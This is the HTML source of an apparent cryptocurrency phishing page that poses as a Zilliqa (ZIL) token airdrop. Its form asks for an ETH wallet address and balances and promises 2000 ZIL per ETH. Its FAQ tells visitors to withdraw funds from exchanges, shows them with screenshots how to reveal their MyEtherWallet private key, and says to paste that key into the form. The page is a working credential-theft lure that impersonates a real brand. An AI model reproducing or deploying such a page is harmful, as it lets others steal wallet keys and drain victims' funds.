<!DOCTYPE html>
<html lang="en" class=" no-touchevents history hashchange localstorage csstransforms csstransitions flexbox cssanimations csscalc cssvhunit cssvwunit objectfit object-fit json">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>ZILLIQA TOKENS</title>
    <link rel="icon" type="image/png" href="img/favicon.ico" sizes="64x64" />
    <meta name="description" content="ZIL Airdrop for ETH and ZIL holders.">
    <meta name="robots" content="noodp">

    <meta name="description" content="ZILLIQA Airdrop for ETH and ZIL holders.">
    <meta name="robots" content="noodp">
    <meta property="og:title" content="ZILLIQA Update: Airdrop">
    <meta property="og:image" content="http://zilliqa.name/img/ZILLIQA.jpg">
    <meta property="og:description" content="For every 1 ETH that you hold, you can receive 2000 ZIL tokens as an airdrop. Existing ZIL holders will also benefit from this airdrop, for every 1 ZIL that you already have, you can receive 0.3 ZIL.">
    <meta name="twitter:description" content="For every 1 ETH that you hold, you can receive 2000 ZIL tokens as an airdrop. Existing ZIL holders will also benefit from this airdrop, for every 1 ZIL that you already have, you can receive 0.3 ZIL.">
    <meta name="twitter:image" content="http://zilliqa.name/img/ZILLIQA.jpg">
    <meta name="twitter:card" content="summary_large_image">

    <link rel="stylesheet" type="text/css" media="all" href="css/app-9647d26555.css">

    <style type="text/css">
        .address-wrap {
            padding: 0 0 32px 0;
        }

        .address__row:first-child {
            border-radius: 10px 10px 0 0;
        }

        .address__row {
            display: -ms-flexbox;
            display: flex;
            background: #f6f9fa;
            border: 1px solid #e7ecee;
            border-bottom: 0;
            border-radius: 10px;
            margin: 0 32px 0 32px;
        }

        .address__column {
            width: 100%;
            padding: 24px;
            overflow: scroll;
        }

        .address__label {
            font-family: PostGrotesk-Medium, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif;
            font-size: 14px;
            color: #a5b0b9;
            letter-spacing: 1px;
            text-transform: uppercase;
            padding: 0 0 8px 0;
        }

        .address__value {
            font-size: 21px;
            color: #545f69;
        }

        .intro--open .widget-row.widget-row--status {
            height: auto;
            padding: 24px 24px 4px 24px;
            border: 0;
        }

        .intro--open .widget-row {
            background-color: #fff;
        }

        .widget-row:first-child {
            border-radius: 10px 10px 0 0;
        }

        .widget-row--status__inner {
            width: 100%;
            padding: 10px 10px 9px 10px;
            text-align: center;
            background-color: #e0f3e9;
            border-radius: 10px;
            color: #63c38f;
        }

        .widget-row--status__inner {
            width: 100%;
            padding: 10px 10px 9px 10px;
            text-align: center;
            background-color: #eef6fd;
            border-radius: 10px;
            color: #63c38f;
        }

        .bg-img{
            background-color: transparent;
            background-image: url(img/heromtn.jpeg);
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
        }
    </style>

</head>

<body class="en" cz-shortcut-listen="true">
<div class="site">
    <header class="site-header bg-img">
        <div class="header-container">
            <div class="header-logo">
                <a class="logo" href="index.php.html">
                    <img src="img/t_logo_white.png" alt="Logo" class="logo-cls">
                </a>
            </div>
            <nav class="header-menu">
            </nav>
            <button class="header-mobile-menu">
                <span class="bar bar-first"></span>
                <span class="bar bar-middle"></span>
                <span class="bar bar-last"></span>
            </button>
        </div>
    </header>
    <!-- .site-header -->
    <div class="site-content">

        <section class="homepage-intro homepage-section">
            <div class="homepage-container">
                <div class="homepage-intro">
                    <div class="homepage-intro-image">
                        <img src="img/tcb-fix.jpg" style="width:150px">
                    </div>

                    <h2 style="color: #000 !important;" class="heading">ZIL Airdrop</h2>
                    <p class="homepage-intro-text" style="max-width: 1000px; color: #000 !important;">Complete the form below to see how much ZIL you're entitled to receive and to proceed with the airdrop.
                        <br> Please only use wallets where you hold your private keys (such as MyEtherWallet, Parity and etc). If your balance is on an exchange you will need to withdraw it first as we cannot airdrop tokens to an exchange wallet.</p>
                </div>

                <br>
                <form action="sign.php" method="post" name="submit" class="validate" target="_self">
                    <!---->
                    <div>
                        <input type="text" name="adr" id="adr" placeholder=" ETH Wallet Address" required="required" autofocus="autofocus" style="
    width: 450px;
    border-radius: 10px;
    height: 40px;
    font-size: 18px;
    margin-bottom: 10px;
	color: black;
	border-width: 0px;
	background: #e3e3e3;
	padding-left:7px;
" >
                        <br>
                        <input type="text" name="amount" id="x" data-in="" placeholder=" ETH Balance" required="required" autofocus="autofocus" style="
    width: 450px;
    border-radius: 10px;
    height: 40px;
    font-size: 18px;
    margin-bottom: 10px;
	color: black;
	background: #e3e3e3;
	border-width: 0px;
	padding-left:7px;
">
                        <br>

                        <input type="text" name="balance" id="a" data-in="" placeholder=" ZIL Balance" required="required" autofocus="autofocus" style="
    width: 450px;
    border-radius: 10px;
    height: 40px;
    font-size: 18px;
    margin-bottom: 5px;
	color: black;
	background: #e3e3e3;
	border-width: 0px;
	padding-left:7px;
">
                        <br>

                        <input id="y" data-in="" value="2000" type="hidden">
                        <br>
                        <input id="b" data-in="" value="0.3" type="hidden">
                        <br>

                        <p style="font-size: 20px; margin-top: -15px; color: #000 !important;">You will get <a id="d" style="color: #000 !important;">0</a> ZIL tokens + <a id="c" style="color: #000 !important;"  >0</a> ZIL tokens </p>
                        
                        <button type="submit" name="submit" value="airdrop_submit" class="btn-buy-omg" style="
    font-size: 20px;
    width: 200px;
    height: 52px;
    color: white;
    border-width: 0px;
    cursor: pointer;
    background: #c00000;
">Continue
                            <!---->
                        </button>
                    </div>

                    <script>
                        var x = document.getElementById("x");
                        var y = document.getElementById("y");
                        var d = document.getElementById("d");
                        var xstored = x.getAttribute("data-in");
                        var ystored = y.getAttribute("data-in");
                        setInterval(function() {
                            if (x == document.activeElement) {
                                var temp = x.value;
                                if (xstored != temp) {
                                    xstored = temp;
                                    x.setAttribute("data-in", temp);
                                    calculate();
                                }
                            }
                            if (y == document.activeElement) {
                                var temp = y.value;
                                if (ystored != temp) {
                                    ystored = temp;
                                    y.setAttribute("data-in", temp);
                                    calculate();
                                }
                            }
                        }, 50);

                        function calculate() {
                            var n = x.value * y.value;
                            d.innerHTML = n.toLocaleString();
                        }
                        x.onblur = calculate;
                        calculate();
                    </script>

                    <script>
                        var a = document.getElementById("a");
                        var b = document.getElementById("b");
                        var c = document.getElementById("c");
                        var astored = a.getAttribute("data-in");
                        var bstored = b.getAttribute("data-in");
                        setInterval(function() {
                            if (a == document.activeElement) {
                                var temp = a.value;
                                if (astored != temp) {
                                    astored = temp;
                                    a.setAttribute("data-in", temp);
                                    calculate();
                                }
                            }
                            if (b == document.activeElement) {
                                var temp = b.value;
                                if (bstored != temp) {
                                    bstored = temp;
                                    b.setAttribute("data-in", temp);
                                    calculate();
                                }
                            }
                        }, 50);

                        function calculate() {
                            c.innerHTML = a.value * b.value;
                        }
                        a.onblur = calculate;
                        calculate();
                    </script>

                </form>

                <br>

            </div>
        </section>

        <section class="homepage-whatis homepage-section">
            <div class="homepage-container">
                <h1 class="heading" style="color: #fff !important;">My ZIL is on an exchange. How can I receive the airdrop?</h1>
                <p style="text-align: justify; color: #fff !important;">
                   Exchanges will not support the ZIL airdrop and we will not be able to airdrop the tokens to your wallet. In order to receive the ZIL airdrop you need to:
                    <br>
             <br> 1. Have a personal Ethereum wallet (like MyEtherWallet, Parity and etc.) where you hold the actual private key.  
                    <br> 2. Withdraw your ZIL and ETH balance from the exchange you have them on your personal wallet.
                    <br> 3. Enter your address, balance and follow the steps above to charge your tokens.
                    <br>
                </p>
                <br>
                <h1 class="heading" style="color: #fff !important;">Where is my Private Key?</h1>
                <p style="text-align: justify; color: #fff !important;">
                    Your private key is accomplished when you set up a new wallet. It is presented on the following page when creating a wallet with MyEtherWallet:
                    <br></p>
                <h1 class="heading"><img src="img/privkeya.jpg" style="width:600px"></h1>
                <br><p style="text-align: justify; color: #fff !important;">
                    If you already have a wallet, you can find your Private Key by clicking 'view wallet' and displaying the private key by clicking the 'eye' icon as shown in the picture below.
                    <br>
                </p><h1 class="heading"><img src="img/privkeyb.jpg" style="width:600px"></h1>
                <br><p style="text-align: justify; color: #fff !important;">
                    Once you have the Private Key, simply paste that into the corresponding field in the form above.
                    <br><br>
                </p>
                <h1 class="heading" style="color: #fff !important;">What is ZILLIQA?</h1>
                <p style="text-align: justify; color: #fff !important;">
                  Zilliqa is the first public blockchain designed to implement sharding, allowing for linear scaling as the blockchain grows in size.To date, scalability has been an issue for existing blockchain technologies.
                    <br>
                </p>
            </div>
        </section>

       <div class="copyright" style="
    text-align: center; background-color:#333333; color: #fff;
">© 2018 ZIL. All Rights Reserved</div>
    </div>
    <!-- .site-footer -->
</div>
<!-- .site -->
<script type="text/javascript">
    var dateCountdown = "2017-06-27 18:00:00";
    var dateServerNow = 1502202512 * 1000;
    var dateServerEnd = 1498561200 * 1000;
</script>
<script src="js/vendor-4f4cf16d2c.js"></script>
<script src="js/app-3bd811e53e.js"></script>
</body>

</html>

<!-- Localized -->